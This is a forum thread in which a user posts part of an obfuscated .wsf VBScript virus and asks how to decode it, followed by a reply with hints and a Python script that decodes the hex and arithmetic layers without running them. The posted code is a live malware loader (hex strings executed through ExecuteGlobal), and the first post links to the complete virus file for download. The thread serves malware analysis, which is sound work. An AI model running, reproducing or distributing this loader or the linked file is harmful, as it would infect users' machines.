Decipher .wsf virus

Started by **Aincrad**, 9 August 2017, 16:44 PM


**Aincrad**

Hi everyone, I have a virus in .wsf format; does anyone know how to decrypt the code of this virus?


Part of the code: the code is not complete because I can only post 1000 lines.

code:
```xml
<?XML version="1.0"?><job>
<script language="VBScript">
<![CDATA[
' Layer 1 of the obfuscation: every php("...") call turns a long hex string into
' text, and the pieces are concatenated into FACEBOOKFACEBOOK.
FACEBOOKFACEBOOK = FACEBOOKFACEBOOK & php("44696D204F6178737A4D676757574747796D616766784F785162566747734654796B79444F556568727A4C514C79705A6D657A564D6642704345755568697641665376485966615048637A6D544F5550")
FACEBOOKFACEBOOK = FACEBOOKFACEBOOK & php("4A544C554978794E4A43426D6B4D4E676C48664275626F45657647724C63446B4155646C62725479436563744A517268557142666A62486B4A6551444578734E51424C4A4B506B794265545A6D4B4B79464941566E697A6A71694E5244566C744E512C20726E706377467457507051726D43436F4E5A5675556B716F654D534B")
FACEBOOKFACEBOOK = FACEBOOKFACEBOOK & php("435A64746269456B594D51676F71736A6742424254527A664F53575162436F5368666F76754C7874425A644F494166777446444576796F4E59557A534D594B51536177437843716A6846557563675A796A5265504F6A4D64416649676371657971706A744E775A4F4F75444D437972536E5744796E534D7574426D6D686B4C79")
FACEBOOKFACEBOOK = FACEBOOKFACEBOOK & php("5942424B4849726B425A4C556356594D6E792C206661594147674354506B6C4C50746C6D516458737953734946794E4F704E635469596C4D7374457477584554456A5650764F595876746F4457646278514353586449614F684B776746635167796946796E617A45514D76484F6D646B6E4B58555649644C795578544C576856")
FACEBOOKFACEBOOK = FACEBOOKFACEBOOK & php("7256784E72444D7949424B786950474B51544546586B6D624B6478454567784D6952444652596B4376674B59484C414B416D577578684D696D696F52766A686E696C0D0A4F6178737A4D676757574747796D616766784F785162566747734654796B79444F556568727A4C514C79705A6D657A564D6642704345755568697641")
FACEBOOKFACEBOOK = FACEBOOKFACEBOOK & php("665376485966615048637A6D544F55504A544C554978794E4A43426D6B4D4E676C48664275626F45657647724C63446B4155646C62725479436563744A517268557142666A62486B4A6551444578734E51424C4A4B506B794265545A6D4B4B79464941566E697A6A71694E5244566C744E51203D20222D323233392B32323738")
FACEBOOKFACEBOOK = FACEBOOKFACEBOOK & php("2A3333353934302F353539392A323135332D323036322A2D333631382B333635302A383931382D383830342A3632313435332F363135332A313830342D313730352A3132312D31302A3233323230302F323332322A2D34362B3134372A373131382D373030342A393439382D393436362A3438393430342F383433382A373232")
FACEBOOKFACEBOOK = FACEBOOKFACEBOOK & php("35362F323235382A343935352D343835312A2D353739382B353930392A3534323736332F343633392A2D333434392B333534392A2D373839352B383030302A333530372D333339372A2D3936362B313037312A2D393132342B393135362A343132362D343038362A363933302D363833312A2D353834332B353838342A2D3533")
FACEBOOKFACEBOOK = FACEBOOKFACEBOOK & php("362B3536382A383538382D383437332A3538322D3437352A2D3736322B3838332A373634342D373533322A3139363834392F313934392A323833382D323830362A363137332D363131352A343238392D343235372A3631393332302F353935352A383339362D383238352A353233332D353131362A333830332D333730332A35")
FACEBOOKFACEBOOK = FACEBOOKFACEBOOK & php("32393531352F353034332A3330373132302F323739322A2D373738312B373838362A373139352D373135302A3435313936322F343433312A393035382D383933382A313537312D313533392A333537302D333437372A343533362D343437342A323731362D323730362A363237342D363236342A323037322D323033332A3533")
FACEBOOKFACEBOOK = FACEBOOKFACEBOOK & php("36322D353330312A383835342D383830392A373930312D373834302A2D373537362B373632312A312B36302A3335303733302F373739342A373930392D373834382A36303933302F313335342A37373334382F313236382A2D393038322B393131342A38363432372F3837332A313333372D313232362A3333342D3232342A31")
FACEBOOKFACEBOOK = FACEBOOKFACEBOOK & php("303038332D393938312A2D3133372B3234322A2D343136322B343236352A3232313732382F363932392A31373038302F3238302A3138303732302F343031362A2D343532352B343538362A2D383734332B383738382A313437392D313431382A2D353733372B353738322A363835322D363739312A3230313337352F34343735")
FACEBOOKFACEBOOK = FACEBOOKFACEBOOK & php("2A2D343634362B343730372A2D313438382B313533332A343731342D343635332A33373330352F3832392A383433302D383336392A39383530352F323138392A2D333337362B333433372A2D313635342B313639392A2D333131372B333137382A34383337352F313037352A2D363932372B363938382A363738352D36373430")
FACEBOOKFACEBOOK = FACEBOOKFACEBOOK & php("2A3631342D3535332A333730322D333635372A3131343337352F313837352A3339363831302F383831382A333231332D333135322A3132373537352F323833352A2D373736342B373832352A2D313438362B313533312A343438392D343432382A37353537302F373535372A33383432302F333834322A31303035342D393935")
FACEBOOKFACEBOOK = FACEBOOKFACEBOOK & php("302A37343438312F3637312A2D393832382B393934332A3833303930382F373136332A2D343234382B343238302A2D343037352B343133362A3232303936302F363930352A32393835322F3837382A3236333434352F323530392A3132323839392F313236372A2D363337362B363438352A333035312D323935332A33393534")
FACEBOOKFACEBOOK = FACEBOOKFACEBOOK & php("36392F343037372A3238332D3138342A2D393733362B393834332A2D343831362B343836322A3337343030302F333734302A3638363030302F363836302A39313330302F3833302A2D353737302B353838352A39323634342F323031342A2D363633332B363734332A31303033372D393933362A2D343537332B343638392A2D")
FACEBOOKFACEBOOK = FACEBOOKFACEBOOK & php("333834342B333837382A39333533302F393335332A313039323839362F393735382A3534343637372F343930372A383432302D383330362A313233382D313132322A3232343332302F373031302A3236343433352F343333352A34363436342F313435322A393130382D393035392A393736312D393731302A37323631302F37")
FACEBOOKFACEBOOK = FACEBOOKFACEBOOK & php("3236312A353930342D353739392A2D383433302B383534302A3432393036352F333733312A343432332D343330372A3637343035332F363934392A2D323735332B323836312A2D343032342B343133322A383235382D383135382A2D313639342B313739392A3139343832362F313730392A323934372D323931352A2D333037")
FACEBOOKFACEBOOK = FACEBOOKFACEBOOK & php("392B333134302A343932352D343839332A3137323738382F353038322A39333631302F323533302A2D3232372B3334342A323930362D323739312A2D333336312B333436322A2D343031352B343132392A3339313130342F333439322A3834352D3733312A2D333639322B333830332A2D333030342B333130362A3238323636")
FACEBOOKFACEBOOK = FACEBOOKFACEBOOK & php("302F323639322A2D363039382B363230362A2D363239312B363339322A3330383631372F383334312A39333433322F323734382A36393435302F363934352A393334362D393233382A363337362D363236362A35303239302F3437302A3433363936382F343238342A2D313636302B313736352A2D373032312B373132392A39")
FACEBOOKFACEBOOK = FACEBOOKFACEBOOK & php("373336342F3936342A35393734342F313836372A393537372D393531362A3137343536302F353435352A3535333535322F343737322A3737303735342F363736312A2D313032312B313133382A3634393132372F363432372A39383734302F393837342A2D393132332B393233312A2D313831312B313932312A383933313239")
FACEBOOKFACEBOOK = FACEBOOKFACEBOOK & php("2F383334372A2D313238332B313338352A333436362D333335352A3133323531362F313232372A3331363030302F333136302A3831393831372F383131372A3234383633342F323138312A383630382F3236392A343432312D343336302A3633342D3630322A2D353231312B353332372A343539312D343437372A323530312D")
' (the post is cut here; the remaining php("...") lines are not on the page)

' The decoded text is executed as VBScript: this is where the real payload runs.
ExecuteGlobal FACEBOOKFACEBOOK

' php(): takes two hex digits at a time and turns them into one character with
' Chr(CLng("&H" & pair)); it is a plain hex-to-ASCII decoder.
Function php(FACEBOOKFACEBOOK) : For y = 1 To Len(FACEBOOKFACEBOOK) Step 2 : ub = ub & Chr(Clng("&H" & Mid(FACEBOOKFACEBOOK, y, 2))) : Next : php = ub : End Function
]]>
</script>
</job>
```


PS: here is the virus; this is the complete code:

link:
http://www.mediafire.com/file/3rgu85acp4u7uxe/virus.wsf




**MCKSys Argentina**

"If you think something is right only because everyone believes it, you are not thinking."


**tincopasan**

#2

What you have there is a very long hex string that MCKSys Argentina converted to ASCII; what you would still need is to look at the representation of chr(eval(string)) so the code becomes more readable.
Try converting everything from hex to ASCII first, you will see what was posted, and then look at the code of the functions hidden in the VBScript.
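As an added worked example (not code from the thread or from any of its posters), the Python script below does statically what the replies describe, without ever running the .wsf: layer 1 re-implements `php()` (pairs of hex digits to characters), and layer 2 takes the `*`-separated arithmetic expressions in the decoded VBScript and maps each one to `chr(value)` using plain arithmetic instead of `eval()`. The hex chunks are copied from the post above; the `*` separator and the `a+b` / `a-b` / `a/b` shape of every piece are inferred from that fragment, and because the post is truncated the last piece is incomplete and is reported instead of decoded.

```python
import re

# Constructed from the thread: the hex argument of the first php("...") call
# in the posted .wsf (copied verbatim from the post above).
FIRST_CHUNK = "44696D204F6178737A4D676757574747796D616766784F785162566747734654796B79444F556568727A4C514C79705A6D657A564D6642704345755568697641665376485966615048637A6D544F5550"

# Constructed from the thread: the six consecutive php("...") arguments that
# hold the start of the second-layer string (the '<var> = "-2239+2278*...'
# assignment). The post is truncated, so the last chunk ends mid-expression.
LAYER2_CHUNKS = [
    "665376485966615048637A6D544F55504A544C554978794E4A43426D6B4D4E676C48664275626F45657647724C63446B4155646C62725479436563744A517268557142666A62486B4A6551444578734E51424C4A4B506B794265545A6D4B4B79464941566E697A6A71694E5244566C744E51203D20222D323233392B32323738",
    "2A3333353934302F353539392A323135332D323036322A2D333631382B333635302A383931382D383830342A3632313435332F363135332A313830342D313730352A3132312D31302A3233323230302F323332322A2D34362B3134372A373131382D373030342A393439382D393436362A3438393430342F383433382A373232",
    "35362F323235382A343935352D343835312A2D353739382B353930392A3534323736332F343633392A2D333434392B333534392A2D373839352B383030302A333530372D333339372A2D3936362B313037312A2D393132342B393135362A343132362D343038362A363933302D363833312A2D353834332B353838342A2D3533",
    "362B3536382A383538382D383437332A3538322D3437352A2D3736322B3838332A373634342D373533322A3139363834392F313934392A323833382D323830362A363137332D363131352A343238392D343235372A3631393332302F353935352A383339362D383238352A353233332D353131362A333830332D333730332A35",
    "32393531352F353034332A3330373132302F323739322A2D373738312B373838362A373139352D373135302A3435313936322F343433312A393035382D383933382A313537312D313533392A333537302D333437372A343533362D343437342A323731362D323730362A363237342D363236342A323037322D323033332A3533",
    "36322D353330312A383835342D383830392A373930312D373834302A2D373537362B373632312A312B36302A3335303733302F373739342A373930392D373834382A36303933302F313335342A37373334382F313236382A2D393038322B393131342A38363432372F3837332A313333372D313232362A3333342D3232342A31",
]


def php(hexstr: str) -> str:
    """Python equivalent of the script's php(): Chr(CLng("&H" & two hex digits)),
    repeated over the whole string. latin-1 keeps a 1:1 byte-to-char mapping."""
    return bytes.fromhex(hexstr).decode("latin-1")


# One piece of the second layer: an integer, one of + - /, an integer.
_EXPR = re.compile(r"^(-?\d+)([-+/])(\d+)$")


def eval_expr(piece: str):
    """Evaluate one 'a+b', 'a-b' or 'a/b' piece with plain arithmetic (no eval())
    and return the character it encodes, or None when the piece is not a
    complete expression (for example the cut-off tail of the truncated sample)."""
    m = _EXPR.match(piece)
    if m is None:
        return None
    a, op, b = int(m.group(1)), m.group(2), int(m.group(3))
    if op == "+":
        code = a + b
    elif op == "-":
        code = a - b
    else:
        if b == 0 or a % b:  # a non-integer result would not be a character code
            return None
        code = a // b
    return chr(code) if 0 <= code <= 0x10FFFF else None


def decode_layer2(expr_string: str):
    """Split the second-layer string on '*' and map each piece to its character.
    Returns (decoded_text, pieces_that_did_not_parse)."""
    chars, rejected = [], []
    for piece in expr_string.split("*"):
        ch = eval_expr(piece)
        if ch is None:
            rejected.append(piece)
        else:
            chars.append(ch)
    return "".join(chars), rejected


def decode_sample():
    """Run both layers over the chunks copied from the post."""
    layer1 = "".join(php(chunk) for chunk in LAYER2_CHUNKS)
    # layer1 reads '<long variable name> = "-2239+2278*335940/5599*...';
    # the encoded text is everything after the opening quote.
    expr_string = layer1.split('"', 1)[1]
    return decode_layer2(expr_string)


if __name__ == "__main__":
    print(php(FIRST_CHUNK))  # the Dim statement that opens the decoded script
    text, rejected = decode_sample()
    print(repr(text))
    print("incomplete pieces:", rejected)
```

On the six chunks above, layer 2 yields a VBScript comment header, `'<[ recoder : houdini (c) skype : houdini-fx ]>`, followed by the start of a second comment line that the truncation cuts off after `'=-=-=-=-= con`. To go further, feed the whole file from the link through `php()`, then through `decode_layer2()` for every `*`-separated string it contains, always inside an isolated VM and never by running the .wsf or passing any of its strings to `ExecuteGlobal` or Python's `eval()`.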